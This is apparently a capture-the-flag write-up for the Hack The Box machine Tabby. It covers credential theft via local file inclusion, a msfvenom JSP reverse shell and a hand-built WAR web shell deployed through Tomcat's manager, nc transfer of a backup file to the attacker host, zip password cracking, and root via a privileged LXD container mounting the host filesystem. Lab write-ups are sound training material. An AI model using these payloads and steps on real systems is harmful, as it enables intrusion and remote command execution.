[HTB] Tabby — Writeup

Initial Recon

Nmap

$ nmap -Pn --open -p- -sC -sV 10.10.10.194
PORT     STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp open http Apache Tomcat
|_http-title: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Interesting Ports to Note

80/tcp   Apache 2.4.41 serving the "Mega Hosting" site (the LFI lives here)
8080/tcp Apache Tomcat with the manager application reachable
Initial Foothold

LFI (Mega Hosting Website)

The Mega Hosting site on port 80 has a local file inclusion, which was used to read the Tomcat credentials off disk:

User: tomcat
Pass: $3cureP4s5w0rd123!

These credentials are accepted by the Tomcat manager text interface on port 8080 (the /manager/text/ endpoints need the manager-script role, which is why curl works even when the HTML manager page does not). Generate a WAR reverse shell, start a listener on the LPORT (nc -lvnp 443), deploy, then request http://10.10.10.194:8080/bigb0ss/ to trigger it:

$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.3 LPORT=443 -f war > bigb0ss.war
$ curl --user 'tomcat:$3cureP4s5w0rd123!' --upload-file bigb0ss.war 'http://10.10.10.194:8080/manager/text/deploy?path=/bigb0ss'
OK - Deployed application at context path [/bigb0ss]
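The deploy step above in code, as an added example that is not part of the original writeup: the WAR is built by hand instead of with msfvenom so its structure is visible (a WAR is a zip containing WEB-INF/web.xml plus a JSP that Tomcat compiles on first request), and it is PUT to the same /manager/text/deploy endpoint curl used. The command-runner JSP is a stand-in for the msfvenom payload; the manager-script requirement is Tomcat's, the host, credentials and context path are the Tabby values and would be substituted for another target.

```python
"""Build a WAR by hand and deploy it through Tomcat's manager text interface.

Added example for this writeup, not the author's code. The host, credentials
and context path are the Tabby values and serve as placeholders elsewhere.
"""
import base64
import io
import urllib.request
import zipfile

# Minimal deployment descriptor; Tomcat needs WEB-INF/ to treat the zip as a webapp.
WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="3.1"></web-app>
"""

# Stand-in for the msfvenom payload: runs ?cmd=... and returns its stdout.
CMD_JSP = """<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
if (cmd != null) {
    Process p = Runtime.getRuntime().exec(cmd);
    BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
    String line;
    while ((line = r.readLine()) != null) { out.println(line); }
}
%>
"""


def build_war(jsp_source, jsp_name="index.jsp"):
    """Return WAR bytes containing web.xml and one JSP."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("WEB-INF/web.xml", WEB_XML)
        zf.writestr(jsp_name, jsp_source)
    return buf.getvalue()


def war_entries(war_bytes):
    """List the archive members, sorted, as a sanity check before upload."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as zf:
        return sorted(zf.namelist())


def basic_auth_header(user, password):
    """HTTP Basic value: base64(user:password)."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return "Basic " + token


def deploy_url(base_url, context):
    """Manager text-interface deploy URL; update=true overwrites an existing context."""
    return f"{base_url}/manager/text/deploy?path={context}&update=true"


def deploy_war(base_url, user, password, context, war_bytes):
    """PUT the WAR to the manager text interface (requires the manager-script role).

    Returns Tomcat's one-line status, e.g. 'OK - Deployed application at context path [/x]'.
    """
    req = urllib.request.Request(deploy_url(base_url, context), data=war_bytes, method="PUT")
    req.add_header("Authorization", basic_auth_header(user, password))
    req.add_header("Content-Type", "application/octet-stream")
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.read().decode().strip()


if __name__ == "__main__":
    war = build_war(CMD_JSP)
    print(war_entries(war))
    print(deploy_war("http://10.10.10.194:8080", "tomcat", "$3cureP4s5w0rd123!", "/bigb0ss", war))
    # Then: curl 'http://10.10.10.194:8080/bigb0ss/?cmd=id'
```

Run it with the target reachable; the deployed context answers to /bigb0ss/?cmd=... and can be removed afterwards with /manager/text/undeploy?path=/bigb0ss using the same credentials.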

Privilege Escalation

tomcat → ash

A password-protected backup archive (16162020_backup.zip) is found on the box. Pull it back to the attacking machine over nc, crack the archive password with zip2john and john, then reuse that password for the ash account (su ash):

# Kali Box
$ nc -lvnp 80 > backup.zip
# Tabby Box
$ nc 10.10.14.3 80 < 16162020_backup.zip
# Compare md5sum on both sides before cracking; a truncated transfer gives an uncrackable hash
# zip2john (the output is a john hash file, not a zip)
$ zip2john backup.zip > backup.hash
# John
$ john --wordlist=/usr/share/wordlists/rockyou.txt backup.hash
$ john --show backup.hash

user.txt

ash → root (LXD Privilege Escalation)

ash is a member of the lxd group (check with id). Any lxd member can create a privileged container and mount the host's root filesystem into it, which is root on the host. Build a small Alpine image on the attacking box, transfer the tarball to Tabby, then import it there:

# Attacking box
$ git clone https://github.com/saghul/lxd-alpine-builder.git
$ cd lxd-alpine-builder
$ sudo bash build-alpine
# Transfer the resulting alpine-*.tar.gz to Tabby (nc, as above), then on Tabby:
# Initiating the LXD (*Answer things for default setting)
$ lxd init
# Import Image
$ lxc image import ./alpine-v3.12-x86_64-20201030_0034.tar.gz --alias bigb0ss
$ lxc image list
+---------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | TYPE | SIZE | UPLOAD DATE |
+---------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
| bigb0ss | c57d8b79d13e | no | alpine v3.12 (20201030_00:34) | x86_64 | CONTAINER | 3.07MB | Oct 30, 2020 at 4:58am (UTC) |
+---------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
$ lxc init bigb0ss priv -c security.privileged=true
$ lxc config device add priv mydevice disk source=/ path=/mnt/root recursive=true
$ lxc start priv
$ lxc exec priv /bin/sh
~ # id
uid=0(root) gid=0(root)
~ # cat /mnt/root/root/root.txt
b0d...REDACTED...d7c
